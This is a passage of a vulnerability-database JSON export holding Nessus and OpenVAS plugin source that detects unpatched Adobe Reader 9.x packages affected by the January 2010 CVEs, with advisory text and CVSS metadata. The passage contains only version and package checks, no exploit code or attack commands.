Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-9.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:34", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code (CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957,\nCVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "edition": 24, "published": "2010-01-25T00:00:00", "title": "openSUSE Security Update : acroread (acroread-1849)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2010-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread", "cpe:/o:novell:opensuse:11.2"], "id": "SUSE_11_2_ACROREAD-100122.NASL", "href": "https://www.tenable.com/plugins/nessus/44128", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-1849.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44128);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-1849)\");\n script_summary(english:\"Check for the acroread-1849 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code (CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957,\nCVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.3-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:41", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "edition": 24, "published": "2010-01-25T00:00:00", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 1850)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2010-01-25T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread"], "id": "SUSE_11_ACROREAD-100122.NASL", "href": "https://www.tenable.com/plugins/nessus/44130", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44130);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 1850)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1850.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:59", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code (CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957,\nCVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "edition": 24, "published": "2010-01-25T00:00:00", "title": "openSUSE Security Update : acroread (acroread-1849)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2010-01-25T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_11_0_ACROREAD-100122.NASL", "href": "https://www.tenable.com/plugins/nessus/44124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-1849.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44124);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-1849)\");\n script_summary(english:\"Check for the acroread-1849 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code (CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957,\nCVE-2009-3958, CVE-2009-3959, CVE-2009-4324).\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-9.3-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-27T19:23:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "description": "This host is installed with Adobe Reader and is prone to multiple\n vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-01-16T00:00:00", "id": "OPENVAS:1361412562310800428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800428", "type": "openvas", "title": "Adobe Reader Multiple Vulnerabilities -jan10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader Multiple Vulnerabilities -jan10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800428\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\",\n \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37758, 37761, 37757, 37763, 37760, 37759, 37756);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-16 12:13:24 +0100 (Sat, 16 Jan 2010)\");\n script_name(\"Adobe Reader Multiple Vulnerabilities -jan10 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Please see the references for more information.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause memory corruption or\n denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader and Acrobat 9.x before 9.3 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Reader 9.3 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9\\.\")\n{\n if(version_in_range(version:readerVer, test_version:\"9.0\", test_version2:\"9.2\"))\n {\n report = report_fixed_ver(installed_version:readerVer, vulnerable_range:\"9.0 - 9.2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:55:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2010-1278", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "description": "This host is installed with Adobe Reader/Acrobat and is prone to multiple\n vulnerabilities.", "modified": "2020-05-28T00:00:00", "published": "2010-01-16T00:00:00", "id": "OPENVAS:1361412562310800427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800427", "type": "openvas", "title": "Adobe Reader/Acrobat Multiple Vulnerabilities - Jan10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader/Acrobat Multiple Vulnerabilities -jan10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800427\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\",\n \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\",\n \"CVE-2010-1278\");\n script_bugtraq_id(37758, 37761, 37757, 37763, 37760, 37759, 37756, 39615);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-16 12:13:24 +0100 (Sat, 16 Jan 2010)\");\n script_name(\"Adobe Reader/Acrobat Multiple Vulnerabilities - Jan10 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader/Acrobat and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"For more information refer the references section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause memory corruption or\n denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader and Acrobat 9.x before 9.3, 8.x before 8.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Reader and Acrobat 8.2, 9.3 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:acrobat_reader\",\n \"cpe:/a:adobe:acrobat\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.2\") ||\n version_in_range(version:vers, test_version:\"8.0\", test_version2:\"8.2\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"8.2 or 9.3\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-06T13:04:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-4355", "CVE-2009-3957", "CVE-2009-3958", "CVE-2010-0001", "CVE-2009-4324", "CVE-2010-0290", "CVE-2009-3954", "CVE-2009-3956", "CVE-2010-0004", "CVE-2010-0097", "CVE-2010-0005", "CVE-2009-4022", "CVE-2009-2624", "CVE-2010-0012"], "description": "Check for the Version of acroread", "modified": "2018-01-03T00:00:00", "published": "2010-01-29T00:00:00", "id": "OPENVAS:1361412562310850123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850123", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:008\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Specially crafted PDF files could crash acroread. Attackers could\n potentially exploit that to execute arbitrary code CVE-2009-3953,\n CVE-2009-3957,\n CVE-2009-4324.\n\n Acrobat reader was updated to version 9.3 to fix the security issues.\n\n Note: Due to integration issues with the major version update of\n acroread on SLE10 updates for SLE10 are not ready yet. Fixed\n packages will be submitted ASAP.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850123\");\n script_version(\"$Revision: 8274 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 08:28:17 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-29 14:09:25 +0100 (Fri, 29 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-008\");\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", 